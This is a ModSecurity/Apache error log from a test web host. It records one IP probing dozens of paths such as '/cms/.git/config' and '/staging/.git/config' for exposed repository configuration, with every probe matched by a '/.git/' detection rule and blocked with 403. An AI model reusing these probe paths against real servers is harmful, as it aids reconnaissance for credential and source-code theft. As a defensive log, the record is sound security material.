[Fri May 24 12:48:30.350665 2024] [:error] [pid 3435645] [client 91.215.85.43:44810] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /__macosx/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGQAAAAY"]
[Fri May 24 12:48:30.351004 2024] [:error] [pid 3435645] [client 91.215.85.43:44810] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGQAAAAY"]
[Fri May 24 12:48:30.351234 2024] [:error] [pid 3439794] [client 91.215.85.43:44728] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBwAAAAc"]
[Fri May 24 12:48:30.351253 2024] [:error] [pid 3435645] [client 91.215.85.43:44810] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGQAAAAY"]
[Fri May 24 12:48:30.351442 2024] [:error] [pid 3439794] [client 91.215.85.43:44728] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBwAAAAc"]
[Fri May 24 12:48:30.354337 2024] [:error] [pid 3435528] [client 91.215.85.43:44820] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /includes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dwAAAAA"]
[Fri May 24 12:48:30.354511 2024] [:error] [pid 3435528] [client 91.215.85.43:44820] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dwAAAAA"]
[Fri May 24 12:48:30.354651 2024] [:error] [pid 3435528] [client 91.215.85.43:44820] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dwAAAAA"]
[Fri May 24 12:48:30.446133 2024] [:error] [pid 3435530] [client 91.215.85.43:45034] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /static/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVqAAAAAI"]
[Fri May 24 12:48:30.446500 2024] [:error] [pid 3435530] [client 91.215.85.43:45034] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVqAAAAAI"]
[Fri May 24 12:48:30.446695 2024] [:error] [pid 3435530] [client 91.215.85.43:45034] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/static/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVqAAAAAI"]
[Fri May 24 12:48:30.445745 2024] [:error] [pid 3435529] [client 91.215.85.43:45020] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old-cuburn/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMHQAAAAE"]
[Fri May 24 12:48:30.447986 2024] [:error] [pid 3435533] [client 91.215.85.43:45126] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /user/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAwAAAAU"]
[Fri May 24 12:48:30.448309 2024] [:error] [pid 3435533] [client 91.215.85.43:45126] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAwAAAAU"]
[Fri May 24 12:48:30.448552 2024] [:error] [pid 3435529] [client 91.215.85.43:45020] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMHQAAAAE"]
[Fri May 24 12:48:30.448968 2024] [:error] [pid 3435529] [client 91.215.85.43:45020] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/old-cuburn/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMHQAAAAE"]
[Fri May 24 12:48:30.450004 2024] [:error] [pid 3435532] [client 91.215.85.43:45148] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /developer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcQAAAAQ"]
[Fri May 24 12:48:30.450308 2024] [:error] [pid 3435532] [client 91.215.85.43:45148] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcQAAAAQ"]
[Fri May 24 12:48:30.450510 2024] [:error] [pid 3435532] [client 91.215.85.43:45148] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/developer/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcQAAAAQ"]
[Fri May 24 12:48:30.451123 2024] [:error] [pid 3435533] [client 91.215.85.43:45126] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/user/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAwAAAAU"]
[Fri May 24 12:48:30.451798 2024] [:error] [pid 3435531] [client 91.215.85.43:44854] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /cms/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKwAAAAM"]
[Fri May 24 12:48:30.452077 2024] [:error] [pid 3435531] [client 91.215.85.43:44854] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKwAAAAM"]
[Fri May 24 12:48:30.452298 2024] [:error] [pid 3435531] [client 91.215.85.43:44854] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cms/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKwAAAAM"]
[Fri May 24 12:48:30.453519 2024] [:error] [pid 3439795] [client 91.215.85.43:45092] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgfQAAAAg"]
[Fri May 24 12:48:30.454054 2024] [:error] [pid 3439795] [client 91.215.85.43:45092] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgfQAAAAg"]
[Fri May 24 12:48:30.454225 2024] [:error] [pid 3439795] [client 91.215.85.43:45092] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgfQAAAAg"]
[Fri May 24 12:48:30.454251 2024] [:error] [pid 3439796] [client 91.215.85.43:45066] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /site/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgFQAAAAk"]
[Fri May 24 12:48:30.454424 2024] [:error] [pid 3439796] [client 91.215.85.43:45066] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgFQAAAAk"]
[Fri May 24 12:48:30.454575 2024] [:error] [pid 3439796] [client 91.215.85.43:45066] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgFQAAAAk"]
[Fri May 24 12:48:30.455757 2024] [:error] [pid 3439794] [client 91.215.85.43:44950] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaCAAAAAc"]
[Fri May 24 12:48:30.455819 2024] [:error] [pid 3435645] [client 91.215.85.43:45206] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /flock/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGgAAAAY"]
[Fri May 24 12:48:30.455908 2024] [:error] [pid 3439794] [client 91.215.85.43:44950] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaCAAAAAc"]
[Fri May 24 12:48:30.456019 2024] [:error] [pid 3435645] [client 91.215.85.43:45206] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGgAAAAY"]
[Fri May 24 12:48:30.456050 2024] [:error] [pid 3439794] [client 91.215.85.43:44950] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaCAAAAAc"]
[Fri May 24 12:48:30.456202 2024] [:error] [pid 3435645] [client 91.215.85.43:45206] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/flock/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGgAAAAY"]
[Fri May 24 12:48:30.459104 2024] [authz_core:error] [pid 3435528] [client 91.215.85.43:45158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Fri May 24 12:48:30.550241 2024] [:error] [pid 3435530] [client 91.215.85.43:45156] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVqQAAAAI"]
[Fri May 24 12:48:30.550838 2024] [:error] [pid 3435530] [client 91.215.85.43:45156] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVqQAAAAI"]
[Fri May 24 12:48:30.551186 2024] [:error] [pid 3435529] [client 91.215.85.43:45184] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /staging/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMHgAAAAE"]
[Fri May 24 12:48:30.551233 2024] [:error] [pid 3435530] [client 91.215.85.43:45156] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v2/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVqQAAAAI"]
[Fri May 24 12:48:30.551597 2024] [:error] [pid 3435529] [client 91.215.85.43:45184] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/staging/.git/config"] [unique_id "ZlBwfq-u5r0WigdfmiwMHgAAAAE"]
